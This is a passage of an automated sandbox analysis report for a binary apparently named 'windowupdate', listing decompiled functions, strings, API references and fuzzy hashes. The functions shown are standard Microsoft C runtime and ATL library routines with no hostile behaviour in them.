                      0x00d80afe
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d80afe

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D80A5F
                        • Part of subcall function 00D98780: std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      Strings
                      • ( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && , xrefs: 00D80B1C, 00D80B64
                      • __acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required, xrefs: 00D80B5F
                      • %ls, xrefs: 00D80B21
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio.h, xrefs: 00D80B2D, 00D80B5A
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                      • API String ID: 4219598475-3476576762
                      • Opcode ID: 2a47680dacc34165bed36adacbfd16507b8ac2439ff406087872d3118eb16c7b
                      • Instruction ID: 9ce95cd5c78d6350c5979ac85cb8a796c8eb1f5b9b99c2c0e2d7813a0abb1b50
                      • Opcode Fuzzy Hash: 2a47680dacc34165bed36adacbfd16507b8ac2439ff406087872d3118eb16c7b
                      • Instruction Fuzzy Hash: 2931A5B0D01309EFCF14EF94CC56BAEBB74AB10319F244259E1116B2C2D770AA49DBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D93520 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 91%
                      			E00D93520(signed int _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t38;
				void* _t41;

				_t44 = 0xf21098 + _a4 * 4;
				_v12 = E00D5AE90(0xf21098 + _a4 * 4);
				if(_v12 == 0) {
					_v8 = E00D93670(_t44,  *((intOrPtr*)(0xdd8730 + _a4 * 4)));
					__eflags = _v8;
					if(_v8 != 0) {
						_v20 = E00D5AE60(0xf21098 + _a4 * 4, _v8);
						__eflags = _v20;
						if(_v20 != 0) {
							__eflags = _v20 - _v8;
							if(__eflags != 0) {
								_t38 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xff, 0, L"%ls", L"cached_handle == new_handle");
								__eflags = _t38 - 1;
								if(_t38 == 1) {
									asm("int3");
								}
							}
							FreeLibrary(_v8);
						}
						return _v8;
					}
					_v16 = E00D5AE70(0xf21098 + _a4 * 4, 0xffffffff);
					__eflags = _v16;
					if(_v16 != 0) {
						__eflags = _v16 - 0xffffffff;
						if(__eflags != 0) {
							_t41 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xf3, 0, L"%ls", L"cached_handle == INVALID_HANDLE_VALUE");
							__eflags = _t41 - 1;
							if(_t41 == 1) {
								asm("int3");
							}
						}
					}
					return 0;
				}
				if(_v12 == 0xffffffff) {
					return 0;
				}
				return _v12;
			}









                      0x00d9352b
                      0x00d9353b
                      0x00d93542
                      0x00d9356c
                      0x00d9356f
                      0x00d93573
                      0x00d935da
                      0x00d935dd
                      0x00d935e1
                      0x00d935e6
                      0x00d935e9
                      0x00d93603
                      0x00d9360b
                      0x00d9360e
                      0x00d93610
                      0x00d93610
                      0x00d9360e
                      0x00d93615
                      0x00d93615
                      0x00000000
                      0x00d9361b
                      0x00d9358a
                      0x00d9358d
                      0x00d93591
                      0x00d93593
                      0x00d93597
                      0x00d935b1
                      0x00d935b9
                      0x00d935bc
                      0x00d935be
                      0x00d935be
                      0x00d935bc
                      0x00d93597
                      0x00000000
                      0x00d935bf
                      0x00d93548
                      0x00000000
                      0x00d9354a
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                      • API String ID: 0-442401637
                      • Opcode ID: 2431f676a62e38af8f0f54e64c8f8945c3379dd7cbe7ea572ff9ba028975dd3e
                      • Instruction ID: 3da4b5beaa0a87444de0c906d3e257a56c24e521c932220a94465386548799df
                      • Opcode Fuzzy Hash: 2431f676a62e38af8f0f54e64c8f8945c3379dd7cbe7ea572ff9ba028975dd3e
                      • Instruction Fuzzy Hash: 60218F70E0020AFBCF20EBA8DC5AF6D7774AB04714F284A55F815A72C1E670AB49DB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D31BB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E00D31BB0(void* __ecx, void* __esi, char* _a4, short* _a8, int _a12, int _a16) {
				intOrPtr _v8;
				char* _t14;
				int _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t31;
				void* _t32;

				_v8 = 0xcccccccc;
				_t34 = _a8;
				if(_a8 == 0) {
					_t22 = L00D84930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24d, 0, "%ls", L"lpw != 0");
					_t32 = _t32 + 0x18;
					if(_t22 == 1) {
						asm("int3");
					}
				}
				_t36 = _a4;
				if(_a4 == 0) {
					_t21 = L00D84930(_t36, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24e, 0, "%ls", L"lpa != 0");
					_t32 = _t32 + 0x18;
					if(_t21 == 1) {
						asm("int3");
					}
				}
				if(_a4 == 0 || _a8 == 0) {
					_t14 = 0;
				} else {
					 *_a4 = 0;
					_t18 = WideCharToMultiByte(_a16, 0, _a8, 0xffffffff, _a4, _a12, 0, 0);
					__eflags = _t32 - _t32;
					_v8 = E00DC1520(_t18, _t32 - _t32);
					__eflags = _v8;
					if(__eflags != 0) {
						_t14 = _a4;
					} else {
						__eflags = 0;
						if(0 == 0) {
							_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x258, 0, "%ls", 0xde40dc);
							_t32 = _t32 + 0x18;
							__eflags = _t20 - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_t14 = 0;
					}
				}
				return E00DC1520(_t14, _t31 - _t32 + 4);
			}











                      0x00d31bb5
                      0x00d31bbc
                      0x00d31bc0
                      0x00d31bda
                      0x00d31bdf
                      0x00d31be5
                      0x00d31be7
                      0x00d31be7
                      0x00d31be5
                      0x00d31be8
                      0x00d31bec
                      0x00d31c06
                      0x00d31c0b
                      0x00d31c11
                      0x00d31c13
                      0x00d31c13
                      0x00d31c11
                      0x00d31c18
                      0x00d31c20
                      0x00d31c24
                      0x00d31c27
                      0x00d31c44
                      0x00d31c4a
                      0x00d31c51
                      0x00d31c54
                      0x00d31c58
                      0x00d31c88
                      0x00d31c5a
                      0x00d31c5a
                      0x00d31c5c
                      0x00d31c76
                      0x00d31c7b
                      0x00d31c7e
                      0x00d31c81
                      0x00d31c83
                      0x00d31c83
                      0x00d31c81
                      0x00d31c84
                      0x00d31c84
                      0x00d31c58
                      0x00d31c99

                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00D31C44
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: abdec87be69ad4f71221d1363bcf364e47234f904bb9c075aec6eafde307f9b9
                      • Instruction ID: 7800c322c868e1c1214e83fa87cc62317bfd8762877a7093b05cf0512ae766fe
                      • Opcode Fuzzy Hash: abdec87be69ad4f71221d1363bcf364e47234f904bb9c075aec6eafde307f9b9
                      • Instruction Fuzzy Hash: 73213534EC035ABFDF20BA54DC47FAA73649B10B51F249118FA156A1C2E2F1D9908BF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D33E80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81comCOMMON
                      Download Yara Rule
                      C-Code - Quality: 60%
                      			E00D33E80(intOrPtr __ecx, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t23;
				intOrPtr _t24;
				void* _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t48;
				void* _t49;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t51 = _a4;
				if(_a4 == 0) {
					_t23 = L00D84930(_t51, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc25, 0, "%ls", L"ppGIT != 0");
					_t49 = _t49 + 0x18;
					if(_t23 == 1) {
						asm("int3");
					}
				}
				if(_a4 != 0) {
					_v12 = 0;
					_t35 = _v8;
					__eflags =  *((intOrPtr*)(_t35 + 0x28));
					if( *((intOrPtr*)(_t35 + 0x28)) == 0) {
						__imp__CoCreateInstance(0xdc65d0, 0, 1, 0xdf0548, _v8 + 0x28);
						__eflags = _t49 - _t49;
						_v12 = E00DC1520(_t23, _t49 - _t49);
					}
					__eflags = _v12;
					if(__eflags < 0) {
						L13:
						_t24 = _v12;
						L14:
						return E00DC1520(_t24, _t48 - _t49 + 8);
					} else {
						do {
							__eflags =  *((intOrPtr*)(_v8 + 0x28));
							if(__eflags == 0) {
								_t32 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc33, 0, "%ls", L"m_pGIT != 0");
								_t49 = _t49 + 0x18;
								__eflags = _t32 - 1;
								if(_t32 == 1) {
									asm("int3");
								}
							}
							__eflags = 0;
						} while (0 != 0);
						 *_a4 =  *((intOrPtr*)(_v8 + 0x28));
						_t30 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)))) + 4))))( *((intOrPtr*)(_v8 + 0x28)));
						__eflags = _t49 - _t49;
						E00DC1520(_t30, __eflags);
						goto L13;
					}
				}
				_t24 = 0x80004003;
				goto L14;
			}












                      0x00d33e87
                      0x00d33e8e
                      0x00d33e95
                      0x00d33e98
                      0x00d33e9c
                      0x00d33eb6
                      0x00d33ebb
                      0x00d33ec1
                      0x00d33ec3
                      0x00d33ec3
                      0x00d33ec1
                      0x00d33ec8
                      0x00d33ed4
                      0x00d33edb
                      0x00d33ede
                      0x00d33ee2
                      0x00d33efb
                      0x00d33f01
                      0x00d33f08
                      0x00d33f08
                      0x00d33f0b
                      0x00d33f0f
                      0x00d33f6c
                      0x00d33f6c
                      0x00d33f70
                      0x00d33f7d
                      0x00d33f11
                      0x00d33f11
                      0x00d33f14
                      0x00d33f18
                      0x00d33f32
                      0x00d33f37
                      0x00d33f3a
                      0x00d33f3d
                      0x00d33f3f
                      0x00d33f3f
                      0x00d33f3d
                      0x00d33f40
                      0x00d33f40
                      0x00d33f4d
                      0x00d33f63
                      0x00d33f65
                      0x00d33f67
                      0x00000000
                      0x00d33f67
                      0x00d33f0f
                      0x00d33eca
                      0x00000000

                      APIs
                      • CoCreateInstance.OLE32(00DC65D0,00000000,00000001,00DF0548,CCCCCCA4), ref: 00D33EFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_pGIT != 0$ppGIT != 0
                      • API String ID: 542301482-2412262283
                      • Opcode ID: 436f4aece27b66c714a9d22670c79b0039ece1ecac5b5b91ea4ad8bcaa331164
                      • Instruction ID: 07facdc664819d4a8740967349ac51f314f2d5339eaf28052ecee02da4e457c3
                      • Opcode Fuzzy Hash: 436f4aece27b66c714a9d22670c79b0039ece1ecac5b5b91ea4ad8bcaa331164
                      • Instruction Fuzzy Hash: D6219F75E40219AFDB10EB48DA82F9DB771EF54715F608298F9056B282D3B19F80CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D52BE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D52BE0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char* _v40;
				char _v44;
				char _v52;
				char _t27;
				char* _t36;
				char _t38;
				intOrPtr* _t40;
				char* _t47;
				intOrPtr _t57;
				char* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t63;

				_t57 = __edx;
				_t27 = E00D50130(__ecx, 0);
				_t63 = _t62 + 4;
				_v28 = _t27;
				_v24 = _t57;
				E00D4F1F0( &_v20,  &_v28);
				_t47 =  *0xf20640; // 0x0
				_t58 =  *_t47;
				if(_t58 == 0) {
					E00D4FF10( &_v20, 1);
					L10:
					_v44 = E00D50060(") ", 2);
					_v40 = _t58;
					E00D4FCA0( &_v20,  &_v44);
					E00D4F240(_a4,  &_v20);
					return _a4;
				}
				_t36 =  *0xf20640; // 0x0
				_v12 =  *_t36;
				_t59 =  *0xf20640; // 0x0
				_t58 = _t59 + 1;
				 *0xf20640 = _t58;
				_v8 = _v12;
				if(_v8 == 0x30) {
					_t38 = E00D50060("void", 4);
					_t63 = _t63 + 8;
					_v36 = _t38;
					_v32 = _t58;
					E00D4FCA0( &_v20,  &_v36);
					L8:
					goto L10;
				}
				if(_v8 == 0x32) {
					_t58 =  &_v52;
					_t40 = E00D57B30(__ebx, __edi, __esi, __eflags, _t58);
					_t63 = _t63 + 4;
					E00D4FD40( &_v20, _t40);
					goto L8;
				}
				if(_v8 == 0x35) {
					E00D4F350(_a4, 2);
					return _a4;
				}
				goto L8;
			}























                      0x00d52be0
                      0x00d52be8
                      0x00d52bed
                      0x00d52bf0
                      0x00d52bf3
                      0x00d52bfd
                      0x00d52c02
                      0x00d52c08
                      0x00d52c0d
                      0x00d52c93
                      0x00d52c98
                      0x00d52ca7
                      0x00d52caa
                      0x00d52cb4
                      0x00d52cc0
                      0x00000000
                      0x00d52cc5
                      0x00d52c0f
                      0x00d52c17
                      0x00d52c1a
                      0x00d52c20
                      0x00d52c23
                      0x00d52c2c
                      0x00d52c33
                      0x00d52c4a
                      0x00d52c4f
                      0x00d52c52
                      0x00d52c55
                      0x00d52c5f
                      0x00d52c8c
                      0x00000000
                      0x00d52c8c
                      0x00d52c39
                      0x00d52c66
                      0x00d52c6a
                      0x00d52c6f
                      0x00d52c76
                      0x00000000
                      0x00d52c76
                      0x00d52c3f
                      0x00d52c82
                      0x00000000
                      0x00d52c87
                      0x00000000

                      APIs
                        • Part of subcall function 00D50130: UnDecorator::doUnderScore.LIBCMTD ref: 00D50136
                      • DName::DName.LIBVCRUNTIMED ref: 00D52C82
                      • DName::operator+=.LIBCMTD ref: 00D52C93
                      • Mailbox.LIBCMTD ref: 00D52CC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
                      • String ID: 5$void
                      • API String ID: 3298578019-571193483
                      • Opcode ID: 2d7199fe1684af96787b14d100592e8884565f5ead2776e9b107dc5510b87ceb
                      • Instruction ID: 85158473d030745bc305a46816cf52f51e849a0e9d34ac80f10fac9374c270ec
                      • Opcode Fuzzy Hash: 2d7199fe1684af96787b14d100592e8884565f5ead2776e9b107dc5510b87ceb
                      • Instruction Fuzzy Hash: 85212CB19002199BCF18EF94D892AFEBB74FF45301F144169ED1667292DA306A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC2000 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00DC2000(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v16;
				char _v528;
				char _v1040;
				char _v1552;
				void* __esi;
				signed int _t17;
				signed int _t31;
				void* _t44;
				intOrPtr _t46;
				signed int _t47;

				_t45 = __edi;
				_t35 = __ebx;
				_t17 =  *0xdf600c; // 0x71e60372
				_v8 = _t17 ^ _t47;
				_t46 = _a8;
				if(E00DC4BA0(_a4,  &_v16, 3,  &_v1552, 0x100,  &_v1040, 0x100,  &_v528, 0x100) != 0 || E00D82600( &_v1040, 9, L"MSPDB140") != 0 || E00D82600( &_v528, 4, L"DLL") != 0) {
					return E00D47280(0, _t35, _v8 ^ _t47, _t44, _t45, _t46);
				} else {
					_t31 = E00DC2ED0(_t46, _a12,  &_v16,  &_v1552,  &_v1040,  &_v528);
					asm("sbb eax, eax");
					return E00D47280( ~_t31 + 1, __ebx, _v8 ^ _t47, _t44, __edi, _t46);
				}
			}














                      0x00dc2000
                      0x00dc2000
                      0x00dc2009
                      0x00dc2010
                      0x00dc201d
                      0x00dc204f
                      0x00dc20ce
                      0x00dc2085
                      0x00dc20a2
                      0x00dc20ac
                      0x00dc20bd
                      0x00dc20bd

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize$Report
                      • String ID: DLL$MSPDB140
                      • API String ID: 4069037947-1197931371
                      • Opcode ID: ec951592a8d45425c803ddd98c5307c06eba8e95b958383b96b3d3d34587fa31
                      • Instruction ID: 3e46720c858debf2feaf1263e2c9213a649908ef3cf09552886aaf2a4742aad1
                      • Opcode Fuzzy Hash: ec951592a8d45425c803ddd98c5307c06eba8e95b958383b96b3d3d34587fa31
                      • Instruction Fuzzy Hash: FE2139B695011DABDB14DB90DC46FFA73ACDB14304F404295FA09E7181FAB19B5487B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D336B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D32900: ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00D32927
                        • Part of subcall function 00D32900: GetLastError.KERNEL32 ref: 00D32935
                        • Part of subcall function 00D32900: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D32943
                      • _Smanip.LIBCPMTD ref: 00D3372B
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • %ls, xrefs: 00D33742
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3374E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33723
                      • ERROR : Unable to initialize critical section in CAtlComModule, xrefs: 00D3370C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCompareErrorExchangeInlineInterlockedLastPointerSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlComModule
                      • API String ID: 1685745658-3641726158
                      • Opcode ID: ba28e4a80a4e7f185d24fcd670015345fabdfa966610d8b683ca1c43af0223b1
                      • Instruction ID: 951c85c2a55c17b05bbac8558953e3921bd6b2e50efcffed8ab697c558fbbf91
                      • Opcode Fuzzy Hash: ba28e4a80a4e7f185d24fcd670015345fabdfa966610d8b683ca1c43af0223b1
                      • Instruction Fuzzy Hash: 20115EB4E44208FFDB00FF98DA52BADB7B4EB01344F208498E5016B392D6B19F149BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D45FC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _Smanip.LIBCPMTD ref: 00D46025
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D46048
                      • ERROR - Object deleted before window was destroyed, xrefs: 00D46006
                      • %ls, xrefs: 00D4603C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D4601D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
